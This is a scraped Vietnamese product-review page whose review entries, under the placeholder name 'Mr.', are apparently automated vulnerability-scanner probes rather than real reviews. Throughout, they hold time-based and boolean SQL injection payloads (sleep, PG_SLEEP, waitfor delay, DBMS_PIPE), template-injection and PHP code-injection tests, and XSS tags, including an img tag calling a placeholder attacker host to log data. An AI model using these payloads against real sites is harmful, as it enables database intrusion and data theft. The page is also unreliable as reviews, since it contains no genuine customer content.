Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

-1)) OR 711=(SELECT 711 FROM PG_SLEEP(15))--

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

if(now()=sysdate(),sleep(15),0)

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

-5) OR 910=(SELECT 910 FROM PG_SLEEP(15))--

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

-1" OR 2+811-811-1=0+0+0+1 --

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

-1' OR 2+255-255-1=0+0+0+1 or 'HKpF4gnr'='

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

NGf961cH')) OR 858=(SELECT 858 FROM PG_SLEEP(15))--

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

-1' OR 2+144-144-1=0+0+0+1 --

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

-1 OR 2+400-400-1=0+0+0+1

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

-1 OR 2+86-86-1=0+0+0+1 --

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

-5 OR 790=(SELECT 790 FROM PG_SLEEP(15))--

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

g9IrhmDu') OR 23=(SELECT 23 FROM PG_SLEEP(15))--

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

if(now()=sysdate(),sleep(15),0)

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

MiSVz17l')); waitfor delay '0:0:15' --

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

@@h69ma

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1����%2527%2522

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1'"

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

V5P9KA4C' OR 127=(SELECT 127 FROM PG_SLEEP(15))--

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

-1" OR 2+640-640-1=0+0+0+1 --

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

-1' OR 2+408-408-1=0+0+0+1 or 's1LnJmzc'='

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

-1' OR 2+770-770-1=0+0+0+1 --

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

HMa36UHm'); waitfor delay '0:0:15' --

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

-1 OR 2+733-733-1=0+0+0+1

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

-1 OR 2+225-225-1=0+0+0+1 --

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

-1)) OR 15=(SELECT 15 FROM PG_SLEEP(15))--

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

VsxqAse2'; waitfor delay '0:0:15' --

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

-5) OR 508=(SELECT 508 FROM PG_SLEEP(15))--

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

R5qP2lIp')) OR 116=(SELECT 116 FROM PG_SLEEP(15))--

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1 waitfor delay '0:0:15' --

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

-5 OR 260=(SELECT 260 FROM PG_SLEEP(15))--

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

kcpAFEsK') OR 606=(SELECT 606 FROM PG_SLEEP(15))--

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

-1)); waitfor delay '0:0:15' --

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

rHeig0kC')); waitfor delay '0:0:15' --

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

BDAO4ZIe' OR 136=(SELECT 136 FROM PG_SLEEP(15))--

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

dfb__${98991*97996}__::.x

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

dfb[[${98991*97996}]]xca

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

-1); waitfor delay '0:0:15' --

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

dfb{{98991*97996}}xca

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

Aoe9TQCX'); waitfor delay '0:0:15' --

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

-1)) OR 387=(SELECT 387 FROM PG_SLEEP(15))--

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

dfb__${98991*97996}__::.x

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

<%={{={@{#{${dfb}}%>

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

bfgx6022%C0%BEz1%C0%BCz2a%90bcxhjl6022

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

dfb[[${98991*97996}]]xca

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

bfg9966%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl9966

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

-1; waitfor delay '0:0:15' --

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

dfb{{98991*97996}}xca

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

19275699

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

SeoOtxJs'; waitfor delay '0:0:15' --

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

-5) OR 540=(SELECT 540 FROM PG_SLEEP(15))--

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1'"()&%

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1 waitfor delay '0:0:15' --

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

-5 OR 200=(SELECT 200 FROM PG_SLEEP(15))--

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

1

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

<%={{={@{#{${dfb}}%>

Nhận xét này có hữu ích không? 0 0

Mr.<a8YfkEo<

Ngày:
Chưa xác minh

Nhận xét này có hữu ích không? 0 0

Mr.<img sRc='http://attacker-9495/log.php?

Ngày:
Chưa xác minh

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

bfgx3979%C0%BEz1%C0%BCz2a%90bcxhjl3979

Nhận xét này có hữu ích không? 0 0

Mr.<aVoo87F x=9445>

Ngày:
Chưa xác minh

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

bfg2813%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9hjl2813

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

/xfs.bxss.me

Nhận xét này có hữu ích không? 0 0

Mr.<ifRAme sRc=9006.com></IfRamE>

Ngày:
Chưa xác minh

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

-1)); waitfor delay '0:0:15' --

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

ZlSHgPC3')); waitfor delay '0:0:15' --

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

'.print(md5(31337)).'

Nhận xét này có hữu ích không? 0 0

Mr.<WCVTFR>COEIK[!+!]</WCVTFR>

Ngày:
Chưa xác minh

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

${@print(md5(31337))}\

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

19172172

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

${@print(md5(31337))}

Nhận xét này có hữu ích không? 0 0

Mr.FB0MD <ScRiPt >o5Rm(9857)</ScRiPt>

Ngày:
Chưa xác minh

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh

";print(md5(31337));$a="

Nhận xét này có hữu ích không? 0 0

Mr.

Ngày:
Chưa xác minh